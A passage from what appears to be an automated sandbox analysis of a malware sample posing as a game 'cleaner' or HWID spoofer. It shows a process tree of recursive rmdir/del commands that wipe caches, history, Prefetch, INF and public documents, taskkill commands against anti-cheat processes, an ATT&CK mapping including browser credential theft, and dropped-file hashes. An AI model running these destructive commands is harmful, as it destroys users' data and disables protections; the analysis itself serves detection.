    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\Intel
    3⤵
    PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:1584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\INF
    3⤵
    PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\Public\Documents
    3⤵
    PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\temp
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:2488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:1292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1204
- C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe"
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM EpicGamesLauncher.exe
    3⤵
    PID:1764
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:576
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM EasyAntiCheatLauncher.exe
    3⤵
    PID:556
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM EasyAntiCheatLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2476
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM BEService.exe
    3⤵
    PID:3048
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM BEService.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2132
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM Fortnite.exe
    3⤵
    PID:2580
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM Fortnite.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1776
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM BattleEyeLauncher.exe
    3⤵
    PID:2268
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM BattleEyeLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 0A
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c title n*E*x*O*s*S*p*O*o*F*e*R
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c CLS
    3⤵
    PID:2160

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "388275436729566482-88784176125372293279109458-36028771-1926061421-1517447801"
1⤵
PID:3044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "461378458-898841990-748215299-815116852-3699650681216547591747321632-1282319654"
1⤵
PID:1932

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2268

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-596839456049572681649921391628307090290245876-60362547610146147961707418329"
1⤵
PID:572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1371307522-814241262545059222-1775918153575956132932074151155511044-2006668501"
1⤵
PID:556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5655901815146186091282243322118783826-111219232117595082351813782159-1670247814"
1⤵
PID:2476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13797454621529035296-1267739409786688460-2135293987175251297511080980581247525914"
1⤵
PID:1136

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1715861379-14614083815442806741922129577-1243890808208801069-11142964091627708662"
1⤵
PID:1660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-37864161415722402371941679988356843107-8820110752732818101600113914663704586"
1⤵
PID:2132

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1805437606-476665270-1564965759-1345096595-284476711852985626-7764678181425491329"
1⤵
PID:2388

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "793018115-1312830080299828921338598150-18117869711597531464-2305136811781657128"
1⤵
PID:1204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1481423412-77348007499757784-208013063612990275802124946758863072474695205170"
1⤵
PID:2480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-471739285-14306754441036795040-369879870-1762056069-2628733082118251434434953439"
1⤵
PID:2432

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1369487242-696779063951554664-1041837139-570493059-50388296-1441831805471291313"
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17609517901474883102-15867689111694528747-10498103661321556098494759437276291448"
1⤵
PID:2984

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9346467941854478934-1386911453-1534947009484038199940559361-20814034251040096925"
1⤵
PID:2888

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1329138208-601727521-1740567454-4615214-189870356921189443-605986156137450087"
1⤵
PID:900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1652908323-190378885-356413822499287102498845970-1206923055-3532837601517154899"
1⤵
PID:2092

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-148841754117372734541096582521-17520349441395506082-1072123093-14396764321132741847"
1⤵
PID:2548

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-94637142817325194951325247878-1980704738-865177851762551904-1118174979873347089"
1⤵
PID:2072

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1323634846-894229848-1790590697-1434911554-870703159-19051734981079038535-1042684301"
1⤵
PID:2316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10004144981111101834-671600387140896262917771747219379301661734650923-1258939013"
1⤵
PID:2100

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-683960343301065896550975351983580500-262007745-1352867182-19809856451262794705"
1⤵
PID:1364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1945306636313974025559675163-391715382-15847193602101589473-1621245090147899591"
1⤵
PID:2548

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-761385723696591669484205122-17313962791546393608-8547698911084189178835141446"
1⤵
PID:1172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1513504167-51916370-561135476-12897650062094472323-493933523-5788034611059065088"
1⤵
PID:2916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2096885461188332579526690399-203017034244573599-14928752521904274235-126951882"
1⤵
PID:2408

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1275646211-240397671344856323-641043475904540299372645643-1007800299-107118644"
1⤵
PID:1676

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "208915177810778716848173927762019806247-2089601713991720935-4842945301982845335"
1⤵
PID:2640

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RECOVE~2.DAT

Filesize
5KB

MD5
f3ed32c19678c2987f4b8053bea0ce7c

SHA1
7c33e431682b77918c2127d40db32751ecbebb82

SHA256
01db82cb25100f4983588aa64564ade857b915b3598ba79c877c997829513dbe

SHA512
16924ca628318ff47201edbeb03e0784ece9ec61a860671c726c49c64229147d568f86c0b2898c7fc2ecd4df22d87dc3b13e3f7d0048c60e02757571a170b0fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RECOVE~2.DAT

Filesize
5KB

MD5
22fc3b0614be302ced684c6a0e72a1df

SHA1
0b19911b0feeca9761043d02457ff90e0a0d6e05

SHA256
30c66da4b99e436694c41516f96f4236798729c6855f4a56c74bea8a00f41ad7

SHA512
45f302c1c8e3e053d6b36bb1a2ae6c47b68f711c140835fa7042a64e68f7158ff3241f65dfe62e9273c57d7538f5217ceedc01edcf1d4ca3c85e711d4ff7110c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{05B34~1.DAT

Filesize
3KB

MD5
acc403581d8e88ec23a435dd4c3b7574

SHA1
2e2d5cee75453cee310a024239144c9992b07b0a

SHA256
8eadc0d7afb9588fa9c5d4506dde9d9486c5e2ce88ac1ba248a0ca8b1b146953

SHA512
b8a707c4f224f6cd26a593a3adb8b6c731bf0eebe695ea2dffbdb8929437105afa064a98d3cbb0978bf2c98190ae9f8eb0ef64a4d112efabc5831b5d37b12790

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FC459~1.DAT

Filesize
3KB

MD5
c12a02c6f68fe533a1a787b651d9fcfe

SHA1
6c800a93216b62bcd41014daf311f25efedbdf1a

SHA256
5d6a9576ac19d234d8ed3b98afdcc699ff235ec244abc2a0653d98f781d9c35f

SHA512
5317729f74123f2926957a9df91a8bc80b719cd0b6b9027631d1a2f212bcca7451dc4c1319434b2b4933a5bd742b45653bd89552431214f3f6287af109de1c45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini

Filesize
130B

MD5
941682911c20b2dabecb20476f91c98a

SHA1
0b0becf019cb15e75cdfa23bf0d4cb976f109baa

SHA256
3fef99e07b0455f88a5bb59e83329d0bfcebe078d907985d0abf70be26b9b89a

SHA512
a12f5caf5fd39cf2ae600e4378b9296d07787a83ae76bc410b89182a2f8e3202c4ca80d811d548193dff439541de9447f9fa141ebfd771e7ab7a6053cb4af2b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\favicon[1].ico

Filesize
23KB

MD5
ec2c34cadd4b5f4594415127380a85e6

SHA1
e7e129270da0153510ef04a148d08702b980b679

SHA256
128e20b3b15c65dd470cb9d0dc8fe10e2ff9f72fac99ee621b01a391ef6b81c7

SHA512
c1997779ff5d0f74a7fbb359606dab83439c143fbdb52025495bdc3a7cb87188085eaf12cc434cbf63b3f8da5417c8a03f2e64f751c0a63508e4412ea4e7425c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB722.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe

Filesize
217KB

MD5
22bd165c9c2a38257ff23687d9ae0774

SHA1
1a84ddbb284e3e6d95f78371c6c92a1d32ae1271

SHA256
3decb581b456e36db05f7a9ffbc8b1c14964d059ffd6fad6d99b42a1b7dd9bb9

SHA512
fa0a8307fbbc7ed1d49f5612bd05acdfe4aea5a5222dd65b13a5b3b457f1d3865bf794b8bf484c693d6553fc52cd8d5a91c96129fb367f7eb930c223f49678f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe

Filesize
3.2MB

MD5
644399a0aff07bd4f7dc1eb5aa5c0236

SHA1
243f1f7bb95af8d3c44a270772f408c6febb06af

SHA256
5d101b2efae1e9390ac98e014a05d54338ec45cd73ff5dd70842877910f7b758

SHA512
73db539182c67d18b4e491966672876054cdeaae9d5ac024f1991a0551aea74867d9f1df7487655a5c9089553b967c09f558b02e33ec0cc015b6587fd5eb2508

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB81F.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp821B.tmp.bat

Filesize
153B

MD5
98e9104ccdaaa498058a021b489a98b7

SHA1
f967e2cd1519c04e0db1b0e0281718401e7bd1f9

SHA256
52ccd0d34f323c9858bfb006027663eba4f9e4bd53c95a4b41272df9a39d4ac7

SHA512
a87d462eeaaa44c8482c92ddd993edc8023bb2800b641347cce2b91959d2875b50c6cdb784aee099772e9f763a1861f179a58bdcfe6a31b673364056548ed7fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8334.tmp.bat

Filesize
153B

MD5
20aec6cd8faaabf2a6ca9915fc899f58

SHA1
04b14efd6d757fbff638de29ddfa9c26bc583a47

SHA256
0637d58f5c73d5dd14448aa46bcf2eccede299ca5b414830aea98def09c62a59

SHA512
6569a4d32ac1d24b82faffb78240a62ab35ddb349f068d820d31c0abf122c3cdd1ac642a85cfc7b9348937c6c461f7bfb75b8a8146d5c355ff5e9a80d32fc1e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDDD1.tmp.bat

Filesize
161B

MD5
ac403f27fe92b5670fa32b44003db438

SHA1
10c571a115d6c9187ec6cbef29c514c2362b4ef6

SHA256
c5cedfbd0cd1e9c75c06bb18f8050fc4facb8aacb88e0a7dec85f131ff8737c9

SHA512
faaa32f66d389bbe0ccb16da6a864901588c356e88dbfeddc991e3d7e960a30fd2611bdd80c0f6f337af1bc625da12057c1b24102275ec0f395bdaa674d845b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DF789~1.TMP

Filesize
16KB

MD5
18a9d181b191deeb53d54ef0426dbc95

SHA1
75f258b49eb7029dae063e030f69eb43d7145b11

SHA256
5cdb2c9fb60ac423510db913e322340fe98107f6863b03530df4ebb2a01743af

SHA512
19fa2d4a0e6bf667d8a1afb748b9fcffa049e32b62bc8a4f2e64ea76d0a932eac39cd991d34e8eb03d0d74899692d5f482009dcf66c0848144736ede0410b508

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DF98B~1.TMP

Filesize
16KB

MD5
e5468755479dd4350f2affafc7cc0680

SHA1
15670522593ec37d215ca0c654cd67063e04426a

SHA256
aff27908b22ac34e5bad35f3a7765697c1f40621c404c90a319a1654f6f9c745

SHA512
82e9f0f92366d6cd20cffbcbf66bf9ecb61f9848704d53a47c95f6d631b156fa9449398ae2d611da74add65b201bb6fe6324c8d10aefbdf7dd1773df7c2954e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DFA3F~1.TMP

Filesize
16KB

MD5
40f6a908bf7cdd11476662bb37653c31

SHA1
43284b6d54b504f49bac4ba9fc96eaf7607881b4

SHA256
015d7a85efbad2fb3eb30595f9cf792ea23cfeac3457e310be080dd79f92db1b

SHA512
7f13e9c7b6bd7cab33d689f941576ae4f6d834ed7f16ef20ec349f3a7207d4ac001598a35b344aa4f4c8348a7e28ffead5125f9a95027eec29d2bceaaf9415ca

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
46b95dae3f54fdc1f9233132f9051f31

SHA1
3f4f0678488d65960d7defbe2fdeec760cb48bc3

SHA256
bd3b35ef5d01ef7e49fcce690a0b286ff366206d1484d79e7f522529f8365bc6

SHA512
41c832d6ac43f69b448ff21a85e1bd706605bd1ffeede80f797f8fbabddb03cca6ba54eed77e44832035746f8ed473fe61495ddd10b50ecbfd11f4a79857b914

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2c2bf61d3c7707709722226150a9ebe6

SHA1
11d00903ac59f7d0e2b1cafe79338c7401ef84e8

SHA256
02160312ad2acd4a555d6068a88f41665dcb721816fccdcbe9204596314c861e

SHA512
797175440be0da0fe382a1720112886f8080d43a377d1484a58d1c1146a6e2b1e656cc862170778e35635460af83d2de29997bdc3b86fb4538831712dadb9a7d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
ed71d7f4c4b7bf6f3ae63442ae63ef58

SHA1
f80beed1bb44d3ec469f9a9ecac61c5446dcdbed

SHA256
8da96eeb6fef88239de7e17d7a10c5538469bea76e5e3b62bb9e0ed43ccd2b4d

SHA512
4044e367bd81dd0299165e9ebaabf155d455cc4527c945d930d7c921a170b4c713a26d1fb98adea08bc5e80b954e81e686670437d158f62a0d1f48c94afc58cd

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\AppData\Roaming\Network Experience.exe

Filesize
74KB

MD5
912eae8fe9cd4fbce5bc1973d260ac7c

SHA1
c5ef553fbaa201df4b8ab28ce07053eb92e5e225

SHA256
fcc7fb6cb01904fcd07c1a32bf28913e8793219f8536d188b28a3e1659d094a4

SHA512
e8640b818286cfbefdc4b62d79e37138b57580de9c1d9d89858552837ba09f1fcbe8979c96f23c981634716e1280ec33ee7d4be57e5d809b50cf06467803a21b

Download Submit
C:\Users\Admin\NetworkEX.exe

Filesize
585KB

MD5
5350dbd4a054948b6b6f9d9a1e38d4d5

SHA1
cfc57fe0f9e489364bd4d51aaf8f963340267fdb

SHA256
c4e16cd490dfad21cb9b352e3c7c03d99fc5f38cf20ae7cb595d00b082844bdb

SHA512
74d5159cb923d3b416a0c5f82d737e13e14423e43b020a9601a664b1880b579ca7132cc35b0c7a38a072baa633e5fb0495456b4a2b62a5181a179a46421ed9db

Download Submit
C:\Windows\IME\Cleaner.exe

Filesize
177KB

MD5
1b3a357945856b2186a82acf9ac66f21

SHA1
3fb0f26d19d861b888cebdaa36b09804d8109e91

SHA256
df9539f46b9d48b3ee99546efaa31f8c3d205aa4a0f8e0f1f9f116a354b404f9

SHA512
e0c31442d3cc896a2a6937b74cd7155501d4d342df3f0dd1d92e91973f0c549ba5cc7fe819e4aea5e9461dbdecd711e8f0440091ca130dd17e1713d25a5a5b4d

Download Submit
C:\Windows\IME\mac.exe

Filesize
37KB

MD5
6475d7822c98753239315038de651d46

SHA1
f9881c03cfb710afde2903f3af30d4f879ccce17

SHA256
60866d00fe7456991198d3d48ab60adf56e2aed49b81370d32ce79782a5c60e7

SHA512
e806c67888b24833d1a582e0c001b401acf8c733a0b64765c77289c3f7b9b9030b6d7acf4d76ff7e61ca51dd95d9552206e7cf41ccc9d03f3521c80f0b1d766b

Download Submit
C:\Windows\Network.exe

Filesize
91KB

MD5
e14da59f36f995b0a212775074e25ce7

SHA1
574ba408726a83ec63a37782cc4e0cf2f009dabd

SHA256
19fcfef4db315e0d0a65bb7f13b35503559a00f2fb83298449fd719075f32c45

SHA512
6db0b5a34ca9e9e234b841cfb44bc5b5e9c3fea2585634702b8bfcf44af947e48b5c2ac4ec8d532b84b0c7c6aec6ea1b1155f5a75b7fdbe363b1eb2370c63b21

Download Submit
C:\Windows\NetworkEX.exe

Filesize
803KB

MD5
69c2b301ae1b996bc8d50589992df9cd

SHA1
f3e8ddb6351faf2e3556f4b255441be0b1aecd77

SHA256
ac15826ff25a52272687a23bf93194ff27267ab6893ad569afbfa6d2df426b76

SHA512
73e21e1c0ce97c936f02106db593a957fae4129e4746fe9a0b8bea8b5dd407af5cf12b4873ed55bd3e472d16f5e16c54498d9d48546560e719eec51b557bffe9

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
